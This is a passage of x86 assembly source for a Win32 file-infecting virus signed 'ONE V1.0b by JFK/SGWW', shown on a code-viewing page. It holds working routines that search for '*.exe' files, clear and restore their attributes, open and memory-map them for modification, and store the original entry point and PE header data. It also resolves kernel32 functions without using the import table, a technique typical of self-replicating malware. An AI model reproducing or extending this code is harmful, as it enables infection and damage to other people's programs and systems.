📄 one.asm
字号:
ret
SetNOAttribs ENDP
;**** MapFile ****
;This proc gets a files(file in FileFoundData) size, creates a mapped
;object of the size needed, then maps the file into the object created.
;Carry flag is set on errors.
MapFile PROC
;Create File mapping object.
push 0 ;Dont need a name.
mov eax, [ebp+SizeOfHost] ;Size of object.
push eax
push 0 ;Not used.
push PAGE_READWRITE ;We need read+write access.
push 0 ;Default security.
push dword ptr [ebp+OpenFileHandle] ;OPEN file handle.
call [ebp+lpfCreateFileMappingA] ;Create the mapped object.
cmp eax, 0 ;Did we fail?
je OF_Failed ;Yep.
mov [ebp+MappedObjectHandle], eax ;Save handle to mapped object.
;Map file into object.
push 0 ;Map WHOLE file.
;Offsets are not needed cause we're gonna start mapping at the
;beginning of the file.
push 0 ;Low order 32 bits of offset.
push 0 ;High order 32 bits of offset.
push FILE_MAP_WRITE ;We need Read+Write access.
push eax ;Handle of mapping object.
call [ebp+lpfMapViewOfFile] ;Map the file
;Dont ask me why, but this returns some fucked up handle
;to memory that doesnt appear to exist, and the file doesnt
;seem to be read into memory until this memory is actually
;accessed(which magically does NOT cause a page fault)!
;weird! (I could be wrong, maybe just my debugger...)
mov [ebp+MapBaseAddr], eax ;Save base Address.
cmp eax, 0 ;Did we fail?
jne MP_Success ;We succeeded
stc
MP_Success:
ret
MapFile ENDP
;**** RestoreAttribs ****
;This proc restores the attributes of the file pointed to by
;FoundFileData. CarryFlag is NOT set on errors.
RestoreAttribs PROC
;Restore file attributes.
mov eax, [ebp+OrigFileAttribs] ;The files original attribs
push eax
lea eax, [ebp+FoundFileData.WFD_szFileName]
push eax ;Push found files name.
call [ebp+lpfSetFileAttributesA] ;Set the attributes.
ret
RestoreAttribs ENDP
;**** OpenFile ****
;This proc just opens the file pointed to in FoundFileData.
;If successful, the OPEN files handle is put into OpenFileHandle.
;If errors happen, the carry flag is set.
OpenFile PROC
;Open the file.
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push 0 ;0=Request exclusive access
push GENERIC_READ + GENERIC_WRITE
lea eax, [ebp+FoundFileData.WFD_szFileName]
push eax ;Push files name on stack.
call [ebp+lpfCreateFileA] ;Open file.
cmp eax, 0FFFFFFFFh ;Did we fail?
je OF_Failed ;Jeah, we failed. (SETS CARRY)
mov [ebp+OpenFileHandle], eax ;Save handle of OPEN file.
clc ;Clear carry flag (no errors)
ret
OF_Failed:
stc ;Set carry flag.
ret
OpenFile ENDP
;**** CloseFile ****
;This proc just closes the file pointed to by OpenFileHandle.
;Carry flag is NOT set if errors occur.(what for?)
CloseFile PROC
;Close the file.
push dword ptr [ebp+OpenFileHandle] ;Handle of opened file.
call [ebp+lpfCloseHandle] ;Close it
ret
CloseFile ENDP
;**** AlignFix ****
AlignFix PROC
xor edx, edx
div ecx ;/alignment
inc eax ;next alignment
mul ecx ;*alignment
ret
AlignFix ENDP
;**** ExtractAbsoluteAddress ****
ExtractAbsoluteAddress PROC
pushad ;Save everything.
mov ecx, [esi] ;Get string length.
add esi, 4 ;Point to string
rep cmpsb ;Check the string.
popad ;Restore everything.
jne EAA_NotString ;This isn't the string - exit.
xchg esi, eax ;ESI = dword for address.
mov eax, [ebx+1Ch] ;RVA of Function Address array.
add eax, [ebp+UnnamedOffset] ;Plus unused function names.
add eax, [ebp+K32Base] ;Plus DLL load address.
add eax, ecx ;Plus array offset.
mov eax, [eax] ;Get the address.
add eax, [ebp+K32Base] ;Plus DLL load address.
mov [esi], eax ;Save the address.
EAA_NotString:
ret
ExtractAbsoluteAddress ENDP
;**** MyGetProcAddress ****
MyGetProcAddress PROC
push eax ;lpProcName.
mov eax, [ebp+ModHandle] ;< hModule.
push eax ;<
call [ebp+lpfGetProcAddress] ;Call GetProcAddress directly.
cmp eax, 0 ;EAX = 0?
jne MyGetProcDone ;Nope, success.
stc ;Failure.
MyGetProcDone:
ret
MyGetProcAddress ENDP
; ****** DATA ******
K32Base dd 0 ;Start of K32 in memory.
UnnamedOffset dd 0
ModHandle dd 0BFF70000h ;Used with calls to MyGetProcAddr.
lpfGetProcAddress dd 15d ;Crap for finding GetProcAddress.
db "GetProcAddress",0
FoundFileData WIN32_FIND_DATA ? ;Crap used for finding files.
lpsExeFiles db '*.exe',0
OldEA dd 0 ;Original Entry Point(NOT RVA)
OldPhysSize dd 0 ;Old physical size of last object.
FoundFileHandle dd 0 ;Spot for handle of found files.
OpenFileHandle dd 0 ;Spot for handle of open files.
MappedObjectHandle dd 0 ;Handle of mapped object.
OrigFileAttribs dd 0 ;Spot for file attributes.
DataFromFile dd 0 ;Data read from file.
FileBytesRead dd 0 ;Number of bytes read.
MapBaseAddr dd 0 ;Base address of mapped object.
SizeOfHost dd 0 ;Size needed for mapped object.
PE_Header: ;Buffer for PE header.
Sig_Bytes: dd 0
CPU_Type: dw 0
NumbOfObjects dw 0
TimeStamp dd 0
Reserved1 dd 0
Reserved2 dd 0
NT_HDR_Size dw 0
Flags dw 0
Reserved3 dw 0
LMajor db 0
LMinor db 0
Reserved4 dd 0
Reserved5 dd 0
Reserved6 dd 0
EntryPointRVA dd 0
Reserved7 dd 0
Reserved8 dd 0
ImageBase dd 0
ObjectAlign dd 0
FileAlign dd 0
OS_Major dw 0
OS_Minor dw 0
UserMajor dw 0
UserMinor dw 0
SubSysMajor dw 0
SubSysMinor dw 0
Reserved9 dd 0
ImageSize dd 0 ;54h bytes.
ObjectTable: db 240d dup (0) ;Room for 6 object entries.
ImportTable: ; :-)
db 'FindFirstFileA',0
lpfFindFirstFileA dd 0
db 'FindNextFileA',0
lpfFindNextFileA dd 0
db 'GetFileAttributesA',0
lpfGetFileAttributesA dd 0
db 'SetFileAttributesA',0
lpfSetFileAttributesA dd 0
db 'CreateFileA',0
lpfCreateFileA dd 0
db 'SetFilePointer',0
lpfSetFilePointer dd 0
db 'ReadFile',0
lpfReadFile dd 0
db 'GetFileSize',0
lpfGetFileSize dd 0
db 'CreateFileMappingA',0
lpfCreateFileMappingA dd 0
db 'MapViewOfFile',0
lpfMapViewOfFile dd 0
db 'UnmapViewOfFile',0
lpfUnmapViewOfFile dd 0
db 'CloseHandle',0
lpfCloseHandle dd 0
lpsSig db '-=[ONE V1.0b by JFK/SGWW]=-'
v_end:
end v_start⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -